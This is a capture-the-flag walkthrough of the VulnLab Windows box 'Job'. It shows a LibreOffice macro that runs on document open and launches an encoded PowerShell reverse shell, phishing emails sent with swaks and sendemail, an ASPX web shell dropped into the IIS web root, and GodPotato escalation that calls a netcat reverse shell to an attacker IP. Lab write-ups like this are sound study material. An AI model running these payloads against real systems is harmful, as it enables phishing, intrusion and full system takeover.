Overview

Field Detail
Name Job
OS Windows
Difficulty Medium
Platform VulnLab
Topics LibreOffice Macro RCE, SMTP phishing, IIS write access, SeImpersonatePrivilege, GodPotato

Attack Path

flowchart TD A[Attacker ] --> B[Send malicious .odt\nto career@job.local] B --> C[LibreOffice macro executes\nreverse shell] C --> D[Shell as jack.black\nMedium Integrity] D --> E[jack.black in 'developers' group\nWrite access to C:\\inetpub\\wwwroot] E --> F[Upload Nishang ASPX shell\nShell as IIS App Pool] F --> G[SeImpersonatePrivilege enabled\non web service account] G --> H[GodPotato exploit] H --> I[Shell as NT AUTHORITY\\SYSTEM]

Enumeration

Service Scan

An Nmap scan reveals a fairly minimal attack surface — only standard Windows services are exposed.

nmap --privileged -sC -sV -vv -oA nmap/job --min-rate 5000 -T4 -p- 10.129.224.177
Port Service Notes
25/tcp hMailServer SMTP AUTH LOGIN supported
80/tcp Microsoft IIS 10.0 Static site at Job.local
445/tcp SMB
3389/tcp RDP
5985/tcp WinRM

HTTP Enumeration

The web page at port 80 is a largely static site. The only useful detail it reveals is an instruction to submit CVs to career@job.local in LibreOffice document format. This is the key entry point.

Foothold — Shell as jack.black

Crafting the Malicious LibreOffice Macro

Since the target opens .odt files, we can embed an auto-executing macro.

  1. Open LibreOffice Writer and navigate to Tools → Edit Macros.
  2. Create a new Standard Module inside the document with the following payload:
Sub OnLoad
    Shell("cmd /c powershell -e <BASE64_ENCODED_REVERSE_SHELL>")
End Sub
  1. Bind the macro to the document open event via Tools → Customize → Events → Open Document → select your macro.
  2. Save the file as .odt.

Sending the Phishing Email

With the document ready, deliver it to the target mailbox using either sendemail or swaks:

# Using sendemail
sendemail -s job.local -f "nitel <test@nitel.com>" -t career@job.local \
    -o tls=no -m "hey pls check my cv" -a nitel.odt

# Using swaks
swaks --to career@job.local --from test@nitel.com \
    --header "Subject: Hire me!" \
    --body "Please review my resume" \
    --attach @nitel.odt \
    --server 10.129.224.177

Start a listener on your attack machine and wait for the document to be opened.

Shell Received

PS C:\Program Files\LibreOffice\program> whoami /all

USER INFORMATION
----------------
User Name      SID
============== =============================================
job\jack.black S-1-5-21-3629909232-404814612-4151782453-1000

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

jack.black runs at Medium Integrity with no directly dangerous privileges — but is a member of the developers group.

Lateral Movement — Shell as IIS App Pool

Leveraging the developers Group

Group membership in developers grants write access to C:\inetpub\wwwroot. We can drop a web shell here to get code execution under the IIS application pool identity.

Upload a Nishang ASPX reverse shell:

# From jack.black's shell
copy \\10.10.14.152\share\shell.aspx C:\inetpub\wwwroot\shell.aspx

Then trigger it from your browser or via curl:

curl http://job.local/shell.aspx

This gives a new shell running as the IIS application pool service account.

Privilege Escalation — Shell as SYSTEM

SeImpersonatePrivilege via GodPotato

The IIS service account has SeImpersonatePrivilege enabled — a well-known path to SYSTEM via potato-family exploits.

Upload GodPotato and nc.exe to a world-writable staging directory:

copy \\10.10.14.152\share\gp.exe C:\ProgramData\gp.exe
copy \\10.10.14.152\share\nc.exe C:\ProgramData\nc.exe

With nc.exe

C:\ProgramData\gp.exe -cmd "C:\ProgramData\nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.152 7000"

Without nc.exe (pure PowerShell)

C:\ProgramData\gp.exe -cmd "powershell -ep bypass -e <BASE64_ENCODED_REVERSE_SHELL>"

Catch the callback on your listener — and you’re SYSTEM.

Key Takeaways

  • Client-side phishing via SMTP is underrated on CTF boxes. When a mail server is open and the web page hints at document submissions, always think macro payloads. LibreOffice’s Open Document event makes this trivially automatable.
  • Group membership deserves as much attention as privileges. jack.black had no dangerous token privileges, but the developers group quietly granted write access to the web root — enabling a clean lateral move to a service account.
  • SeImpersonatePrivilege on a Windows service account is almost always game over. GodPotato is a reliable modern option that works even on fully patched Windows Server targets where older potato exploits fail.
  • Stageless delivery works well here. Both the ASPX shell and GodPotato were dropped to C:\ProgramData, which is world-writable by default — no need for complex staging infrastructure.